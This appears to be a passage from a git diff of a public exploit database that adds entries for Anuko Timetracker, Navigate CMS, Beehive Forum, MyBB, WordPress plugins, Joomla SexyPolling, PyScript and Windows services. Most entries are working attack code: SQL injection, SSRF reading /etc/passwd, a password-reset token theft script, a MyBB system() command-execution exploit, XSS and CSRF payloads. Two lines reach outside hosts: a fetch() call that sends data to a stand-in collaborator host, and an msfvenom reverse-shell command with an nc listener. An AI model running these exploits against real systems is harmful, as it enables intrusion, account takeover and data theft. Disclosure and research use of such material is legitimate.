start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text
if "Uncompleted entry already" in start_p:
print("[-] A running puncher entry is seen. Exiting")
exit(0)
print("[*] Puncher started. Getting id added...")
puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text
time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p)
time_edit_ids.sort()
latest_id = time_edit_ids[-1].split("=")[1]
return latest_id
def stop_puncher_sqli(project_id, sqli=""):
get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()"
if sqli == "":
sqli = get_all_tables
new_date = date+timedelta(minutes=10)
data = {
"btn_stop": "Stop",
"browser_today" : "",
"browser_time" : "04:10",
"date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text
print("[*] Puncher stopped")
def get_puncher_result(puncher_id):
time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text
soup = BeautifulSoup(time_edit_p, features="lxml")
note_content = soup.find("textarea", {"name" : "note", "id" : "note"})
print("[+] Leaked: {}".format(note_content.text))
def delete_puncher_entry(puncher_id):
data = {
"delete_button" : "Delete",
"id" : puncher_id
}
headers = {
"Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id)
}
del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers)
print("[*] Puncher {} deleted".format(puncher_id))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="Anuko Timetracker username")
parser.add_argument('--password', required=True, help="Anuko Timetracker password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables")
args = parser.parse_args()
r_client = requests.Session()
host = args.host
date = datetime.now()
username = args.username
password = args.password
login(username, password)
proj_id = get_puncher_page()
puncher_id = start_puncher(proj_id)
sqli=""
if args.sqli != None:
sqli = args.sqli
stop_puncher_sqli(proj_id, sqli=sqli)
get_puncher_result(puncher_id)
delete_puncher_entry(puncher_id)

42
exploits/php/webapps/50920.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Explore CMS 1.0 - SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: CVE-2022-27412
# POC
# SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.
#Steps to reproduce
Following URL is vulnerable to SQL Injection in the 'id' field.
GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: REDACTED
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding
10.3.34-MariaDB
Server accepts the payload and the response get delayed by 7 seconds.

87
exploits/php/webapps/50921.py Executable file
View file

@ -0,0 +1,87 @@
#!/usr/bin/env python3
# Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
# Exploit Author: cheshireca7
# Vendor Homepage: https://www.navigatecms.com/
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download
# Version: 2.9.4 and earlier
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-28117
#
# -*- coding: utf-8 -*-
import requests as r, signal
from emoji import emojize
from argparse import ArgumentParser
from sys import exit
from requests_toolbelt.multipart.encoder import MultipartEncoder
from hashlib import md5
from time import sleep
from base64 import b64decode,b64encode
from colorama import Fore, Style
#proxies = {'http':'http://127.0.0.1:8080'}
def handler(signum, frame):
print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8')))
exit()
def login():
print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...")
sleep(1)
try:
# Grabbing CSRF Token
s = r.Session()
resp = s.get(f"{args.target}/login.php")#, proxies=proxies)
csrf_token = resp.headers['X-Csrf-Token']
# Performing login
data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"})
headers = {'Content-Type':data.content_type}
resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies)
except:
print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in")
exit(-1)
if resp.status_code == 302:
print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!")
for cookie in resp.cookies:
if "NVSID" in cookie.name:
return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}")
else:
print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials")
exit(-1)
def exploit(values):
print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...")
sleep(1)
# Abusing cache feature to retrieve response
data = {'limit':'5','language':'en','url':f'{args.payload}'}
headers = {'X-Csrf-Token':values[0]}
cookies = {values[1].split('=')[0]:values[1].split('=')[1]}
resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies)
# Retrieving the file with response from static route
md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest()
resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies)
if len(resp.text) > 0:
print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...")
sleep(1)
print(f"\n{resp.text}")
exit(0)
else:
print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received")
exit(-1)
if __name__ == '__main__':
# Define parameters
signal.signal(signal.SIGINT, handler)
parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)')
parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)')
parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)')
parser.add_argument('-p','--password', required=True, help='Password to log in the CMS')
parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate')
args = parser.parse_args()
exploit(login())

28
exploits/php/webapps/50922.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: PHProjekt PhpSimplyGest v1.3.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-05-05
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)
# Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)
# Version: 1.3
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)
# CVE: CVE-2022-27308
# Description:
A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor,
like "MyProjects") allows attacker to execute arbitrary web scripts or HTML.
Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard,
estimates, report or finding, it will be triggered once page gets loaded.
# Steps to reproduce:
Click on Projects and add or edit an existing one,
Insert the following PoC inside the Title
<<SCRIPT>alert("XSS here");//\<</SCRIPT>
Click on 'Send'.
If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.

111
exploits/php/webapps/50923.py Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg
# Vulnerability: In the functionality "forgot password", it's possible to
modify the Header "Host", #injecting malicious host, allowing stealing the
token and resetting the password from a victim.#(Requires user interaction)
import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string
endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'
def init_req():
session = requests.Session()
r = session.get(url_forgot)
cookie = session.cookies.get_dict()
cookie = cookie['sess_hash']
soup = BeautifulSoup(r.text, 'lxml')
hash_request = soup.input['id']
csrf_token = soup.input['value']
return hash_request, csrf_token, cookie
def forgot_req(hash_request: str, csrf_token: str, cookie: str):
headers= {
'Host': hostheader,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'logon' : 'admin',
'request' : 'Request'
}
r = requests.post(url_forgot, headers=headers, data=data)
if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
print('')
print('[*] A mail has been sent to the victim')
socket_req()
else:
print('[*] The mail has not been sent')
def socket_req():
print(f"[*] Listening on port {lport}...." )
print('[*] Waitting the victim clicks in the malicious link\n')
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((lhost, lport))
s.listen()
(sock_c, _) = s.accept()
get_request = sock_c.recv(4096)
user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))
print("[*] Stole token: " + user_token)
change_pw(user_token)
def change_pw(user_token: str):
c = string.ascii_letters + string.digits
password = ''.join(random.choice(c) for _ in range(6))
hash_request, csrf_token, cookie = init_req()
headers= {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'u' : '1',
'h' : user_token,
'pw' : password,
'cpw' : password,
'save' : 'Save'
}
r = requests.post(url_change, headers=headers, data=data)
if('Your password has been changed' in r.text):
print(f'[*] The password has been changed to: {password}')
else:
print('[*] The password has been changed')
hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)

121
exploits/php/webapps/50924.py Executable file
View file

@ -0,0 +1,121 @@
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_client.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
if "Access Denied" in config_settings_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding a malicious settings...")
soup = BeautifulSoup(config_settings_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
rand_string = get_rand_string()
if raw_cmd != "":
extra = "\" . system('{}') .\"".format(raw_cmd)
else:
extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
data = {
"my_post_key" : my_post_key,
"title" : "An innocent setting",
"description" : "An innocent description",
"gid" : 1,
"disporder" : "",
"name" : rand_string,
"type" : "\tphp",
"extra" : extra,
"value" : "An innocent value"
}
post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
if post_setting.status_code != 302:
soup = BeautifulSoup(post_setting.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] Malicious post settings accepted!")
return rand_string
def get_rand_string(length=20):
return ''.join(random.choice(string.ascii_letters) for i in range(length))
def get_cmd_result(ident_string, raw_cmd=""):
conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
soup = BeautifulSoup(conf_settings_list, "lxml")
row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
if raw_cmd == "":
cmd_result = b64decode(cmd_result[2:]).decode()
print("[+] Result: {}".format(str(cmd_result)))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)

26
exploits/php/webapps/50925.html Normal file
View file

@ -0,0 +1,26 @@
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
<input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
<input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
<input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
<input type="hidden" name="ba_lp_attr[logo_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
<input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
<input type="hidden" name="ba_lp_attr[bg_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
<input type="hidden" name="ba_lp_options_save" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

147
exploits/php/webapps/50927.txt Normal file
View file

@ -0,0 +1,147 @@
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye
SexyPolling SQL Injection
====================
| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
Summary
========
[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.
Vulnerability Description
====================
In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.
In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:
```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```
These are later used unfiltered by the WHERE clause:
```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
Proof Of Concept
==============
To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6
polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```
The HTTP-Resoonse contains a mysql error:
```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` <= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```
Vulnerable Versions
================
All versions below version 2.1.8
Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7
Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.
Mitigation
=========
Sexy Polling 2.1.8 fixed that issue
Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |
*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*
Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

32
exploits/php/webapps/50928.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Vulnerable Code:
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department) LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");
# Vulnerable URL
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
# POC
```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```
# POC Image
https://prnt.sc/AECcFRHhe2ib

18
exploits/python/remote/50918.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>

2
exploits/ruby/webapps/50888.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: Gitlab 14.9 - Authentication Bypass # Exploit Title: Gitlab 14.9 - Authentication Bypass
# Date: 12/04/2022 # Date: 12/04/2022
# Exploit Authors: Greenwolf & stacksmashing # Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/ # Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install # Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 # Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2

2
exploits/ruby/webapps/50889.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: Gitlab Stored XSS # Exploit Title: Gitlab Stored XSS
# Date: 12/04/2022 # Date: 12/04/2022
# Exploit Authors: Greenwolf & stacksmashing # Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/ # Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install # Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 # Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2

32
exploits/windows/local/50901.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto
C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: UDisk Monitor Z5 Phone
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-810865D
Nombre del sistema operativo: Microsoft Windows 10 Pro
Versión del sistema operativo: 10.0.19044 N/D Compilación 19044

32
exploits/windows/local/50902.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ITeCProteccioAppServer
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ITeCProteccioAppServer
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-0DL5SID
Nombre del sistema operativo: Microsoft Windows 11 Home
Versión del sistema operativo: 10.0.22000 N/D Compilación 22000

49
exploits/windows/local/50903.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)
# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist
All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.
First, we need to check if services are running using the following command:
wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running
Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running
Now we need to check if we have enough privileges to replace the binaries:
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F) <= same here
...
icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F) <= and here
...
# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)
As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>

26
exploits/windows/local/50912.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell
#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.
#!/bin/python3
import msgpackrpc
LADDR = "192.168.14.129"
LPORT = 1338
